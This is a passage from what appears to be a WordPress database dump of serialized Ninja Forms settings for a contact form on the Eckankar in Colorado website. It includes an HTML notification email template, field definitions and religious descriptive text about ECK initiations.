Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:361:\"<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n</div>\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";}s:2:\"id\";i:39;}i:3;a:2:{s:8:\"settings\";a:29:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:42:35\";s:5:\"label\";s:11:\"Admin Email\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:12:\"date_updated\";s:10:\"2016-01-19\";s:9:\"from_name\";s:41:\"Colorado RESA Organization Communications\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:31:\"webmaster@eckankar-colorado.org\";s:13:\"email_subject\";s:43:\"ECK Colorado Website - Form Record Received\";s:13:\"email_message\";s:3876:\"<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello!</strong><strong> You have a new <span style=\"color: #23507d\">Colorado RESA Organization Communications</span> form submission.<br /><br /><br />\r\n </strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Colorado RESA organization</em>.<br /><br /><br />\r\n <strong><br /><br /><br />\r\n The following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_6}Â {field:lastname_8}</span> has submitted:</strong></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_6}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_8}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_10}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_9}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_11}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:listselect_15}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_16}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p> </p><br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:40;}}s:8:\"settings\";a:30:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";s:0:\"\";s:5:\"title\";s:41:\"Colorado RESA Organization Communications\";s:10:\"created_at\";s:19:\"2019-07-15 14:05:20\";s:10:\"form_title\";s:41:\"Colorado RESA Organization Communications\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:12:\"date_updated\";s:19:\"2017-07-04 18:06:40\";s:6:\"status\";s:0:\"\";s:8:\"last_sub\";s:2:\"15\";s:11:\"append_page\";s:0:\"\";s:4:\"ajax\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:10:\"conditions\";a:0:{}s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:0:\"\";s:10:\"add_submit\";s:1:\"1\";s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:13:{i:0;s:7:\"html_18\";i:1;s:9:\"textbox_6\";i:2;s:10:\"lastname_8\";i:3;s:8:\"email_10\";i:4;s:7:\"phone_9\";i:5;s:13:\"listselect_11\";i:6;s:5:\"hr_13\";i:7;s:7:\"html_14\";i:8;s:13:\"listselect_15\";i:9;s:11:\"textarea_16\";i:10;s:18:\"html_1663797801429\";i:11;s:9:\"submit_12\";i:12;s:18:\"html_1663797799791\";}s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";s:20:\"repeatable_fieldsets\";s:0:\"\";}s:14:\"deleted_fields\";a:0:{}s:15:\"deleted_actions\";a:0:{}}',4,0x00),(11,'a:7:{s:2:\"id\";i:11;s:20:\"show_publish_options\";b:0;s:6:\"fields\";a:11:{i:0;a:2:{s:8:\"settings\";a:20:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:1;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:4:\"Text\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:1257:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Springs Initiators and ESAâs</span></span></span></strong></span></h3>\r\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.\r\n\r\n<strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\r\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\r\nto offer this assistance.\r\n\r\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\r\n\r\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:1262:\"<p><p></p><h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Springs Initiators and ESA\'s</span></span></span></strong></span></h3>\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.</p><p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\nto offer this assistance.\n\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\n\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>\";s:3:\"key\";s:8:\"html_117\";s:15:\"container_class\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:11:\"field_label\";s:4:\"Text\";s:9:\"field_key\";s:8:\"html_117\";}s:2:\"id\";i:108;}i:1;a:2:{s:8:\"settings\";a:51:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:2;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:7:\"textbox\";s:6:\"def_id\";s:1:\"6\";s:5:\"label\";s:10:\"First Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"1\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"textbox_118\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:11:\"textbox_118\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:109;}i:2;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:3;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"lastname\";s:6:\"def_id\";s:1:\"7\";s:5:\"label\";s:9:\"Last Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:12:\"lastname_119\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:12:\"lastname_119\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:110;}i:3;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:4;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"email\";s:6:\"def_id\";s:2:\"14\";s:5:\"label\";s:5:\"Email\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_phone\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:9:\"email_120\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:9:\"email_120\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:111;}i:4;a:2:{s:8:\"settings\";a:50:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:5;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"phone\";s:6:\"def_id\";s:2:\"15\";s:5:\"label\";s:5:\"Phone\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:14:\"(999) 999-9999\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_email\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:9:\"phone_121\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:21:\"custom_name_attribute\";s:5:\"phone\";s:23:\"personally_identifiable\";s:1:\"1\";s:11:\"field_label\";s:5:\"Phone\";s:9:\"field_key\";s:9:\"phone_121\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:112;}i:5;a:2:{s:8:\"settings\";a:30:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:6;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:10:\"listselect\";s:5:\"label\";s:15:\"Your Local Area\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:8:\"dropdown\";s:10:\"multi_size\";s:1:\"5\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:8:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a 